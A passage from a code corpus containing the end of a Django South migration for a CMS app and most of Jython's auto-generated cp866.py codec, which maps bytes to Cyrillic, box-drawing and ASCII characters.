            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'sites.site': {
            'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        }
    }

    complete_apps = ['cms']
| bsd-3-clause |
mosbasik/buzhug | javasrc/lib/Jython/Lib/encodings/cp866.py | 593 | 34652 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP866.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless CP866 codec driven by the module-level mapping tables."""

    def encode(self, input, errors='strict'):
        # Table-driven encode via the module-level encoding_map.
        return codecs.charmap_encode(input, errors, encoding_map)

    def decode(self, input, errors='strict'):
        # Table-driven decode via the module-level decoding_table.
        return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    def encode(self, input, final=False):
        # charmap_encode returns (bytes, length); only the bytes are wanted.
        encoded, _consumed = codecs.charmap_encode(input, self.errors, encoding_map)
        return encoded
class IncrementalDecoder(codecs.IncrementalDecoder):
    def decode(self, input, final=False):
        # charmap_decode returns (text, length); only the text is wanted.
        decoded, _consumed = codecs.charmap_decode(input, self.errors, decoding_table)
        return decoded
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream writer: inherits the stateless encode from Codec.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream reader: inherits the stateless decode from Codec.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record used to register the 'cp866' codec."""
    # One shared stateless Codec instance serves both directions.
    codec = Codec()
    return codecs.CodecInfo(
        name='cp866',
        encode=codec.encode,
        decode=codec.decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Map
# Legacy decoding map (byte -> Unicode code point).  Bytes 0x00-0x7f are the
# ASCII identity mapping; only the high half (0x80-0xff) is overridden below.
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
    0x0080: 0x0410, # CYRILLIC CAPITAL LETTER A
    0x0081: 0x0411, # CYRILLIC CAPITAL LETTER BE
    0x0082: 0x0412, # CYRILLIC CAPITAL LETTER VE
    0x0083: 0x0413, # CYRILLIC CAPITAL LETTER GHE
    0x0084: 0x0414, # CYRILLIC CAPITAL LETTER DE
    0x0085: 0x0415, # CYRILLIC CAPITAL LETTER IE
    0x0086: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
    0x0087: 0x0417, # CYRILLIC CAPITAL LETTER ZE
    0x0088: 0x0418, # CYRILLIC CAPITAL LETTER I
    0x0089: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
    0x008a: 0x041a, # CYRILLIC CAPITAL LETTER KA
    0x008b: 0x041b, # CYRILLIC CAPITAL LETTER EL
    0x008c: 0x041c, # CYRILLIC CAPITAL LETTER EM
    0x008d: 0x041d, # CYRILLIC CAPITAL LETTER EN
    0x008e: 0x041e, # CYRILLIC CAPITAL LETTER O
    0x008f: 0x041f, # CYRILLIC CAPITAL LETTER PE
    0x0090: 0x0420, # CYRILLIC CAPITAL LETTER ER
    0x0091: 0x0421, # CYRILLIC CAPITAL LETTER ES
    0x0092: 0x0422, # CYRILLIC CAPITAL LETTER TE
    0x0093: 0x0423, # CYRILLIC CAPITAL LETTER U
    0x0094: 0x0424, # CYRILLIC CAPITAL LETTER EF
    0x0095: 0x0425, # CYRILLIC CAPITAL LETTER HA
    0x0096: 0x0426, # CYRILLIC CAPITAL LETTER TSE
    0x0097: 0x0427, # CYRILLIC CAPITAL LETTER CHE
    0x0098: 0x0428, # CYRILLIC CAPITAL LETTER SHA
    0x0099: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
    0x009a: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
    0x009b: 0x042b, # CYRILLIC CAPITAL LETTER YERU
    0x009c: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
    0x009d: 0x042d, # CYRILLIC CAPITAL LETTER E
    0x009e: 0x042e, # CYRILLIC CAPITAL LETTER YU
    0x009f: 0x042f, # CYRILLIC CAPITAL LETTER YA
    0x00a0: 0x0430, # CYRILLIC SMALL LETTER A
    0x00a1: 0x0431, # CYRILLIC SMALL LETTER BE
    0x00a2: 0x0432, # CYRILLIC SMALL LETTER VE
    0x00a3: 0x0433, # CYRILLIC SMALL LETTER GHE
    0x00a4: 0x0434, # CYRILLIC SMALL LETTER DE
    0x00a5: 0x0435, # CYRILLIC SMALL LETTER IE
    0x00a6: 0x0436, # CYRILLIC SMALL LETTER ZHE
    0x00a7: 0x0437, # CYRILLIC SMALL LETTER ZE
    0x00a8: 0x0438, # CYRILLIC SMALL LETTER I
    0x00a9: 0x0439, # CYRILLIC SMALL LETTER SHORT I
    0x00aa: 0x043a, # CYRILLIC SMALL LETTER KA
    0x00ab: 0x043b, # CYRILLIC SMALL LETTER EL
    0x00ac: 0x043c, # CYRILLIC SMALL LETTER EM
    0x00ad: 0x043d, # CYRILLIC SMALL LETTER EN
    0x00ae: 0x043e, # CYRILLIC SMALL LETTER O
    0x00af: 0x043f, # CYRILLIC SMALL LETTER PE
    0x00b0: 0x2591, # LIGHT SHADE
    0x00b1: 0x2592, # MEDIUM SHADE
    0x00b2: 0x2593, # DARK SHADE
    0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
    0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
    0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
    0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
    0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
    0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
    0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
    0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
    0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
    0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
    0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
    0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
    0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
    0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
    0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
    0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
    0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
    0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
    0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
    0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
    0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
    0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
    0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
    0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
    0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
    0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
    0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
    0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
    0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
    0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
    0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
    0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
    0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
    0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
    0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
    0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
    0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
    0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
    0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
    0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
    0x00db: 0x2588, # FULL BLOCK
    0x00dc: 0x2584, # LOWER HALF BLOCK
    0x00dd: 0x258c, # LEFT HALF BLOCK
    0x00de: 0x2590, # RIGHT HALF BLOCK
    0x00df: 0x2580, # UPPER HALF BLOCK
    0x00e0: 0x0440, # CYRILLIC SMALL LETTER ER
    0x00e1: 0x0441, # CYRILLIC SMALL LETTER ES
    0x00e2: 0x0442, # CYRILLIC SMALL LETTER TE
    0x00e3: 0x0443, # CYRILLIC SMALL LETTER U
    0x00e4: 0x0444, # CYRILLIC SMALL LETTER EF
    0x00e5: 0x0445, # CYRILLIC SMALL LETTER HA
    0x00e6: 0x0446, # CYRILLIC SMALL LETTER TSE
    0x00e7: 0x0447, # CYRILLIC SMALL LETTER CHE
    0x00e8: 0x0448, # CYRILLIC SMALL LETTER SHA
    0x00e9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
    0x00ea: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
    0x00eb: 0x044b, # CYRILLIC SMALL LETTER YERU
    0x00ec: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
    0x00ed: 0x044d, # CYRILLIC SMALL LETTER E
    0x00ee: 0x044e, # CYRILLIC SMALL LETTER YU
    0x00ef: 0x044f, # CYRILLIC SMALL LETTER YA
    0x00f0: 0x0401, # CYRILLIC CAPITAL LETTER IO
    0x00f1: 0x0451, # CYRILLIC SMALL LETTER IO
    0x00f2: 0x0404, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
    0x00f3: 0x0454, # CYRILLIC SMALL LETTER UKRAINIAN IE
    0x00f4: 0x0407, # CYRILLIC CAPITAL LETTER YI
    0x00f5: 0x0457, # CYRILLIC SMALL LETTER YI
    0x00f6: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U
    0x00f7: 0x045e, # CYRILLIC SMALL LETTER SHORT U
    0x00f8: 0x00b0, # DEGREE SIGN
    0x00f9: 0x2219, # BULLET OPERATOR
    0x00fa: 0x00b7, # MIDDLE DOT
    0x00fb: 0x221a, # SQUARE ROOT
    0x00fc: 0x2116, # NUMERO SIGN
    0x00fd: 0x00a4, # CURRENCY SIGN
    0x00fe: 0x25a0, # BLACK SQUARE
    0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\u0410' # 0x0080 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0x0081 -> CYRILLIC CAPITAL LETTER BE
u'\u0412' # 0x0082 -> CYRILLIC CAPITAL LETTER VE
u'\u0413' # 0x0083 -> CYRILLIC CAPITAL LETTER GHE
u'\u0414' # 0x0084 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0x0085 -> CYRILLIC CAPITAL LETTER IE
u'\u0416' # 0x0086 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0417' # 0x0087 -> CYRILLIC CAPITAL LETTER ZE
u'\u0418' # 0x0088 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0x0089 -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0x008a -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0x008b -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0x008c -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0x008d -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0x008e -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0x008f -> CYRILLIC CAPITAL LETTER PE
u'\u0420' # 0x0090 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0x0091 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0x0092 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0x0093 -> CYRILLIC CAPITAL LETTER U
u'\u0424' # 0x0094 -> CYRILLIC CAPITAL LETTER EF
u'\u0425' # 0x0095 -> CYRILLIC CAPITAL LETTER HA
u'\u0426' # 0x0096 -> CYRILLIC CAPITAL LETTER TSE
u'\u0427' # 0x0097 -> CYRILLIC CAPITAL LETTER CHE
u'\u0428' # 0x0098 -> CYRILLIC CAPITAL LETTER SHA
u'\u0429' # 0x0099 -> CYRILLIC CAPITAL LETTER SHCHA
u'\u042a' # 0x009a -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u042b' # 0x009b -> CYRILLIC CAPITAL LETTER YERU
u'\u042c' # 0x009c -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042d' # 0x009d -> CYRILLIC CAPITAL LETTER E
u'\u042e' # 0x009e -> CYRILLIC CAPITAL LETTER YU
u'\u042f' # 0x009f -> CYRILLIC CAPITAL LETTER YA
u'\u0430' # 0x00a0 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0x00a1 -> CYRILLIC SMALL LETTER BE
u'\u0432' # 0x00a2 -> CYRILLIC SMALL LETTER VE
u'\u0433' # 0x00a3 -> CYRILLIC SMALL LETTER GHE
u'\u0434' # 0x00a4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0x00a5 -> CYRILLIC SMALL LETTER IE
u'\u0436' # 0x00a6 -> CYRILLIC SMALL LETTER ZHE
u'\u0437' # 0x00a7 -> CYRILLIC SMALL LETTER ZE
u'\u0438' # 0x00a8 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0x00a9 -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0x00aa -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0x00ab -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0x00ac -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0x00ad -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0x00ae -> CYRILLIC SMALL LETTER O
u'\u043f' # 0x00af -> CYRILLIC SMALL LETTER PE
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
u'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
u'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
u'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
u'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
u'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
u'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
u'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
u'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
u'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
u'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
u'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
u'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
u'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
u'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u258c' # 0x00dd -> LEFT HALF BLOCK
u'\u2590' # 0x00de -> RIGHT HALF BLOCK
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\u0440' # 0x00e0 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0x00e1 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0x00e2 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0x00e3 -> CYRILLIC SMALL LETTER U
u'\u0444' # 0x00e4 -> CYRILLIC SMALL LETTER EF
u'\u0445' # 0x00e5 -> CYRILLIC SMALL LETTER HA
u'\u0446' # 0x00e6 -> CYRILLIC SMALL LETTER TSE
u'\u0447' # 0x00e7 -> CYRILLIC SMALL LETTER CHE
u'\u0448' # 0x00e8 -> CYRILLIC SMALL LETTER SHA
u'\u0449' # 0x00e9 -> CYRILLIC SMALL LETTER SHCHA
u'\u044a' # 0x00ea -> CYRILLIC SMALL LETTER HARD SIGN
u'\u044b' # 0x00eb -> CYRILLIC SMALL LETTER YERU
u'\u044c' # 0x00ec -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044d' # 0x00ed -> CYRILLIC SMALL LETTER E
u'\u044e' # 0x00ee -> CYRILLIC SMALL LETTER YU
u'\u044f' # 0x00ef -> CYRILLIC SMALL LETTER YA
u'\u0401' # 0x00f0 -> CYRILLIC CAPITAL LETTER IO
u'\u0451' # 0x00f1 -> CYRILLIC SMALL LETTER IO
u'\u0404' # 0x00f2 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0454' # 0x00f3 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0407' # 0x00f4 -> CYRILLIC CAPITAL LETTER YI
u'\u0457' # 0x00f5 -> CYRILLIC SMALL LETTER YI
u'\u040e' # 0x00f6 -> CYRILLIC CAPITAL LETTER SHORT U
u'\u045e' # 0x00f7 -> CYRILLIC SMALL LETTER SHORT U
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\u2219' # 0x00f9 -> BULLET OPERATOR
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\u221a' # 0x00fb -> SQUARE ROOT
u'\u2116' # 0x00fc -> NUMERO SIGN
u'\xa4' # 0x00fd -> CURRENCY SIGN
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
# Inverse of the decoding table above: maps each Unicode code point back to
# the single-byte value of this code page. 0x00-0x7f are ASCII identities;
# the upper half covers Cyrillic letters, box-drawing and block characters.
encoding_map = {
    0x0000: 0x0000,  # NULL
    0x0001: 0x0001,  # START OF HEADING
    0x0002: 0x0002,  # START OF TEXT
    0x0003: 0x0003,  # END OF TEXT
    0x0004: 0x0004,  # END OF TRANSMISSION
    0x0005: 0x0005,  # ENQUIRY
    0x0006: 0x0006,  # ACKNOWLEDGE
    0x0007: 0x0007,  # BELL
    0x0008: 0x0008,  # BACKSPACE
    0x0009: 0x0009,  # HORIZONTAL TABULATION
    0x000a: 0x000a,  # LINE FEED
    0x000b: 0x000b,  # VERTICAL TABULATION
    0x000c: 0x000c,  # FORM FEED
    0x000d: 0x000d,  # CARRIAGE RETURN
    0x000e: 0x000e,  # SHIFT OUT
    0x000f: 0x000f,  # SHIFT IN
    0x0010: 0x0010,  # DATA LINK ESCAPE
    0x0011: 0x0011,  # DEVICE CONTROL ONE
    0x0012: 0x0012,  # DEVICE CONTROL TWO
    0x0013: 0x0013,  # DEVICE CONTROL THREE
    0x0014: 0x0014,  # DEVICE CONTROL FOUR
    0x0015: 0x0015,  # NEGATIVE ACKNOWLEDGE
    0x0016: 0x0016,  # SYNCHRONOUS IDLE
    0x0017: 0x0017,  # END OF TRANSMISSION BLOCK
    0x0018: 0x0018,  # CANCEL
    0x0019: 0x0019,  # END OF MEDIUM
    0x001a: 0x001a,  # SUBSTITUTE
    0x001b: 0x001b,  # ESCAPE
    0x001c: 0x001c,  # FILE SEPARATOR
    0x001d: 0x001d,  # GROUP SEPARATOR
    0x001e: 0x001e,  # RECORD SEPARATOR
    0x001f: 0x001f,  # UNIT SEPARATOR
    0x0020: 0x0020,  # SPACE
    0x0021: 0x0021,  # EXCLAMATION MARK
    0x0022: 0x0022,  # QUOTATION MARK
    0x0023: 0x0023,  # NUMBER SIGN
    0x0024: 0x0024,  # DOLLAR SIGN
    0x0025: 0x0025,  # PERCENT SIGN
    0x0026: 0x0026,  # AMPERSAND
    0x0027: 0x0027,  # APOSTROPHE
    0x0028: 0x0028,  # LEFT PARENTHESIS
